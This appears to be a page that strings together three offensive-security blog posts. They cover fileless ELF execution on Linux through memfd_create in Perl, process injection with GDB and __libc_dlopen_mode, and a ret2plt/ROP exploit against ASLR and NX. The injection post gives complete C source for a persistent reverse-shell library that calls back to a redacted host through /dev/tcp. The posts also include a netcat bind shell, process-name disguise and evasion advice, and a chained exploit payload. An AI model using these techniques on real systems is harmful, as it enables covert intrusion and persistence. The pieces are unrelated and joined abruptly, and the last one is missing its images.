День: 02.04.2018

In which we run a normal ELF binary on Linux without touching the filesystem (except 

).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under 

 or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting 

 in userland, or loading a library into another process?

Enter 

. This handy little system call is something like 

, but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in 

 (e.g. 

), which, as it turns out, 

 will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in 

name

 [an argument to 

memfd_create(2)

] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory 

/proc/self/fd/

. The displayed name is always prefixed with 

memfd:

 and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which 

 will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing 

, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /proc/10766/fd

total 0

lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -&gt; /memfd:kittens <span class="o">(</span>deleted<span class="o">)</span>

lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -&gt; /memfd: <span class="o">(</span>deleted<span class="o">)</span>

Here we see two anonymous files, one named 

 and one without a name at all. The 

 is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call 

, from our initial vector (e.g. injection into a Perl or Python program with 

), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s 

 solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with 

 doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with 

.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~<span class="nv">$ </span>uname <span class="nt">-r</span>

4.4.0-116-generic

On Target

Aside 

ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed 

, we’ll use the 

 system call to make our anonymous file. We’ll pass it the 

 flag (analogous to 

), so that the file descriptor we get will be automatically closed when we 

 the ELF binary.

Because we’re using Perl’s 

 to call the 

, we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable 

 constant. Instead, we’ll need to pass 

 the raw system call number for 

 and the numeric constant for 

. Both of these are found in header files in 

. System call numbers are stored in 

s starting with 

.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include<span class="nv">$ </span>egrep <span class="nt">-r</span> <span class="s1">'__NR_memfd_create|MFD_CLOEXEC'</span> <span class="k">*</span>

asm-generic/unistd.h:#define __NR_memfd_create 279

asm-generic/unistd.h:__SYSCALL<span class="o">(</span>__NR_memfd_create, sys_memfd_create<span class="o">)</span>

linux/memfd.h:#define MFD_CLOEXEC               0x0001U

x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319

x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356

x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create <span class="o">(</span>__X32_SYSCALL_BIT + 319<span class="o">)</span>

x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like 

 is system call number 319 on 64-bit Linux (

 in a file with a name ending in 

), and 

 is a consatnt 

 (i.e. 1, in 

). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s 

 (or more specifically, 

).

The last thing we need is a name for our file. In a file listing, 

 is probably a bit better-looking than 

, so we’ll pass an empty string to 

 via 

. Perl’s 

 won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

<span class="k">my</span> <span class="nv">$name</span> <span class="o">=</span> <span class="s">""</span><span class="p">;</span>

<span class="k">my</span> <span class="nv">$fd</span> <span class="o">=</span> <span class="nb">syscall</span><span class="p">(</span><span class="mi">319</span><span class="p">,</span> <span class="nv">$name</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="nv">$fd</span><span class="p">)</span> <span class="p">{</span>

        <span class="nb">die</span> <span class="s">"memfd_create: $!"</span><span class="p">;</span>

<span class="p">}</span>

We now have a file descriptor number in 

. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~<span class="nv">$ </span>perl <span class="nt">-e</span> <span class="s1">'$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'</span>

total 0

lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -&gt; /dev/pts/0

lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -&gt; /memfd: <span class="o">(</span>deleted<span class="o">)</span>

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s 

, which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like 

 (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

<span class="nb">open</span><span class="p">(</span><span class="k">my</span> <span class="nv">$FH</span><span class="p">,</span> <span class="s">'&gt;&amp;='</span><span class="o">.</span><span class="nv">$fd</span><span class="p">)</span> <span class="ow">or</span> <span class="nb">die</span> <span class="s">"open: $!"</span><span class="p">;</span>

<span class="nb">select</span><span class="p">((</span><span class="nb">select</span><span class="p">(</span><span class="nv">$FH</span><span class="p">),</span> <span class="vg">$|</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]);</span>

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl <span class="nt">-e</span> <span class="s1">'$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(&lt;&gt;)'</span> ./elfbinary

This will give us many, many lines similar to:

<span class="k">print</span> <span class="nv">$FH</span> <span class="nb">pack</span> <span class="sx">q/H*/</span><span class="p">,</span> <span class="sx">q/7f454c4602010100000000000000000002003e0001000000304f450000000000/</span> <span class="ow">or</span> <span class="nb">die</span> <span class="sx">qq/write: $!/</span><span class="p">;</span>

<span class="k">print</span> <span class="nv">$FH</span> <span class="nb">pack</span> <span class="sx">q/H*/</span><span class="p">,</span> <span class="sx">q/4000000000000000c80100000000000000000000400038000700400017000300/</span> <span class="ow">or</span> <span class="nb">die</span> <span class="sx">qq/write: $!/</span><span class="p">;</span>

<span class="k">print</span> <span class="nv">$FH</span> <span class="nb">pack</span> <span class="sx">q/H*/</span><span class="p">,</span> <span class="sx">q/0600000004000000400000000000000040004000000000004000400000000000/</span> <span class="ow">or</span> <span class="nb">die</span> <span class="sx">qq/write: $!/</span><span class="p">;</span>

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: 

fork(2)

Ok, 

 is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s 

 is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling 

). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using 

 to spawn multiple children looks something like:

<span class="k">while</span> <span class="p">(</span><span class="nv">$keep_going</span><span class="p">)</span> <span class="p">{</span>

        <span class="k">my</span> <span class="nv">$pid</span> <span class="o">=</span> <span class="nb">fork</span><span class="p">();</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Error</span>

                <span class="nb">die</span> <span class="s">"fork: $!"</span><span class="p">;</span>

        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="mi">0</span> <span class="o">==</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Child</span>

                <span class="c1"># Do child things here</span>

                <span class="nb">exit</span> <span class="mi">0</span><span class="p">;</span>

        <span class="p">}</span>

<span class="p">}</span>

Another handy use of 

, especially when done twice with a call to 

 in the middle, is to spawn a disassociated child and let the parent terminate:

<span class="c1"># Spawn child</span>

<span class="k">my</span> <span class="nv">$pid</span> <span class="o">=</span> <span class="nb">fork</span><span class="p">();</span>

<span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Error</span>

        <span class="nb">die</span> <span class="s">"fork1: $!"</span><span class="p">;</span>

<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="mi">0</span> <span class="o">!=</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Parent terminates</span>

        <span class="nb">exit</span> <span class="mi">0</span><span class="p">;</span>

<span class="p">}</span>

<span class="c1"># In the child, become session leader</span>

<span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="nb">syscall</span><span class="p">(</span><span class="mi">112</span><span class="p">))</span> <span class="p">{</span>

        <span class="nb">die</span> <span class="s">"setsid: $!"</span><span class="p">;</span>

<span class="p">}</span>



<span class="c1"># Spawn grandchild</span>

<span class="nv">$pid</span> <span class="o">=</span> <span class="nb">fork</span><span class="p">();</span>

<span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Error</span>

        <span class="nb">die</span> <span class="s">"fork2: $!"</span><span class="p">;</span>

<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="mi">0</span> <span class="o">!=</span> <span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="c1"># Child terminates</span>

        <span class="nb">exit</span> <span class="mi">0</span><span class="p">;</span>

<span class="p">}</span>

<span class="c1"># In the grandchild here, do grandchild things</span>

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The 

 system call does the second bit: it changes one running program into another. Perl gives us 

, which does more or less the same, albiet with easier syntax.

We pass to 

 two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have 

 in a process listing, we’ll name our process something else.

The syntax for calling 

 is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable 

 to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put 

 in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

<span class="nb">exec</span> <span class="p">{</span><span class="s">"/proc/$$/fd/$fd"</span><span class="p">}</span> <span class="s">"kittens"</span><span class="p">,</span> <span class="s">"-kvl"</span><span class="p">,</span> <span class="s">"4444"</span><span class="p">,</span> <span class="s">"-e"</span><span class="p">,</span> <span class="s">"/bin/sh"</span> <span class="ow">or</span> <span class="nb">die</span> <span class="s">"exec: $!"</span><span class="p">;</span>

The new process won’t have the anonymous file open as a symlink in 

, but the anonymous file will be visible as the

 symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (

 in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep 

 with no arguments from showing up in the process list:

<span class="nb">cat</span> ./elfload.pl | ssh user@target /bin/bash <span class="nt">-c</span> <span class="s1">'"exec -a /sbin/iscsid perl"'</span>

This will run Perl, renamed in the process list to 

 with no arguments. When not given a script or a bit of code with 

, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy 

 trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the 

 symlink.

If something’s monitoring system calls (e.g. someone’s running 

 on sshd), the 

 calls will stick out, as will passing paths in 

 to 

.

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. 

In C (translate to your non-disk-touching language of choice):

1. fd = memfd_create("", MFD_CLOEXEC);
2. write(pid, elfbuffer, elfbuffer_len);
3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using 

 or

, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed 

 statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: 

from libdl, and 

, libc’s implementation. We’ll use 

 because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with 

, which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope<span class="o">=</span>0

<span class="c"># or</span>

<span class="nb">echo </span>0 <span class="o">&gt;</span> /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with 

 and 

 or 

ing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process 

 should do the trick.

<span class="nb">kill</span> <span class="nt">-CONT</span> &lt;PID&gt;

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'

  PID USER     COMMAND

    1 root     /sbin/init

  625 root     /lib/systemd/systemd-journald

  664 root     /sbin/lvmetad -f

  696 root     /lib/systemd/systemd-udevd

 1266 root     /sbin/iscsid

 1267 root     /sbin/iscsid

 1273 root     /usr/lib/accountsservice/accounts-daemon

 1278 root     /usr/sbin/sshd -D

 1447 root      \_ sshd: root@pts/1

 1520 root          \_ -bash

 1538 root              \_ ps -fxo pid,user,args

 1539 root              \_ grep -E --color=auto -v  \[\S+\]$

 1282 root     /lib/systemd/systemd-logind

 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/

 1298 root     /usr/sbin/acpid

 1312 root     /usr/sbin/cron -f

 1316 root     /usr/lib/snapd/snapd

 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog

 1358 root     /usr/lib/policykit-1/polkitd --no-debug

 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220

 1415 root     /sbin/agetty --noclear tty1 linux

 1449 root     /lib/systemd/systemd --user

 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 

. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple 

 unless you really trust the standard error of your victim process.

<span class="cp">#include &lt;pthread.h&gt;

#include &lt;stdlib.h&gt;

#include &lt;unistd.h&gt;

</span>

<span class="cp">#define SLEEP  120                    </span><span class="cm">/* Time to sleep between callbacks */</span><span class="cp">

#define CBADDR "&lt;REDACTED&gt;"           </span><span class="cm">/* Callback address */</span><span class="cp">

#define CBPORT "4444"                 </span><span class="cm">/* Callback port */</span>



<span class="cm">/* Reverse shell command */</span>

<span class="cp">#define CMD "echo 'exec &gt;&amp;/dev/tcp/"\

            CBADDR "/" CBPORT "; exec 0&gt;&amp;1' | /bin/bash"

</span>

<span class="kt">void</span> <span class="o">*</span><span class="n">callback</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">a</span><span class="p">);</span>



<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="cm">/* Run this function on library load */</span>

<span class="kt">void</span> <span class="n">start_callbacks</span><span class="p">(){</span>

        <span class="n">pthread_t</span> <span class="n">tid</span><span class="p">;</span>

        <span class="n">pthread_attr_t</span> <span class="n">attr</span><span class="p">;</span>



        <span class="cm">/* Start thread detached */</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">pthread_attr_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">attr</span><span class="p">))</span> <span class="p">{</span>

                <span class="k">return</span><span class="p">;</span>

        <span class="p">}</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">pthread_attr_setdetachstate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">attr</span><span class="p">,</span>

                                <span class="n">PTHREAD_CREATE_DETACHED</span><span class="p">))</span> <span class="p">{</span>

                <span class="k">return</span><span class="p">;</span>

        <span class="p">}</span>



        <span class="cm">/* Spawn a thread to do the real work */</span>

        <span class="n">pthread_create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">tid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">attr</span><span class="p">,</span> <span class="n">callback</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>

<span class="p">}</span>



<span class="cm">/* callback tries to spawn a reverse shell every so often.  */</span>

<span class="kt">void</span> <span class="o">*</span>

<span class="n">callback</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span>

<span class="p">{</span>

        <span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>

                <span class="cm">/* Try to spawn a reverse shell */</span>

                <span class="n">system</span><span class="p">(</span><span class="n">CMD</span><span class="p">);</span>

                <span class="cm">/* Wait until next shell */</span>

                <span class="n">sleep</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">);</span>

        <span class="p">}</span>

        <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">}</span>

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The 

 applied to 

 causes it to run when the library is loaded. All 

 does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that 

 and 

 must be given to the compiler.

cc <span class="nt">-O2</span> <span class="nt">-fPIC</span> <span class="nt">-o</span> libcallback.so ./callback.c <span class="nt">-lpthread</span> <span class="nt">-shared</span>

It’s not a bad idea to optimize the output with 

 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc <span class="nt">-nvl</span> 4444 <span class="c">#OpenBSD netcat ftw!</span>

 takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like 

. We’ll use 

 for the flags, which corresponds to 

’s 

. To get GDB to cause the process to run the function, we’ll use GDB’s 

 command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a 

command.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# <span class="nb">echo</span> <span class="s1">'print __libc_dlopen_mode("/root/libcallback.so", 2)'</span> | gdb <span class="nt">-p</span> 664

GNU gdb <span class="o">(</span>Ubuntu 7.11.1-0ubuntu1~16.5<span class="o">)</span> 7.11.1

Copyright <span class="o">(</span>C<span class="o">)</span> 2016 Free Software Foundation, Inc.

...snip...

0x00007f6ca1cf75d3 <span class="k">in select</span> <span class="o">()</span> at ../sysdeps/unix/syscall-template.S:84

84      ../sysdeps/unix/syscall-template.S: No such file or directory.

<span class="o">(</span>gdb<span class="o">)</span> <span class="o">[</span>New Thread 0x7f6c9bfff700 <span class="o">(</span>LWP 1590<span class="o">)]</span>

<span class="nv">$1</span> <span class="o">=</span> 312536496

<span class="o">(</span>gdb<span class="o">)</span> quit

A debugging session is active.



        Inferior 1 <span class="o">[</span>process 664] will be detached.



Quit anyway? <span class="o">(</span>y or n<span class="o">)</span> <span class="o">[</span>answered Y<span class="p">;</span> input not from terminal]

Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

<span class="o">[</span>stuart@c2server:/home/stuart]

<span class="nv">$ </span>nc <span class="nt">-nvl</span> 4444

Connection from &lt;REDACTED&gt; 50184 received!

ps <span class="nt">-fxo</span> pid,user,args

...snip...

  664 root     /sbin/lvmetad <span class="nt">-f</span>

 1591 root      <span class="se">\_</span> sh <span class="nt">-c</span> <span class="nb">echo</span> <span class="s1">'exec &gt;&amp;/dev/tcp/&lt;REDACTED&gt;/4444; exec 0&gt;&amp;1'</span> | /bin/bash

 1593 root          <span class="se">\_</span> /bin/bash

 1620 root              <span class="se">\_</span> ps <span class="nt">-fxo</span> pid,user,args

...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen 

, indicating

 returned 

.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in 

:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# <span class="nb">cat</span> /proc/664/maps                                                      

...snip...

7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        

7f6ca0651000-7f6ca0850000 <span class="nt">---p</span> 00001000 fd:01 61077    /root/libcallback.so                        

7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so

7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            

...snip...

If we delete the library, 

 is appended to the filename (i.e.

), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like 

, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into 

, it causes segfaults and makes 

 hang the box).

Process injection on Linux is reasonably easy:

1. Write a library (shared object file) with a constructor.
2. Load it with 
   echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.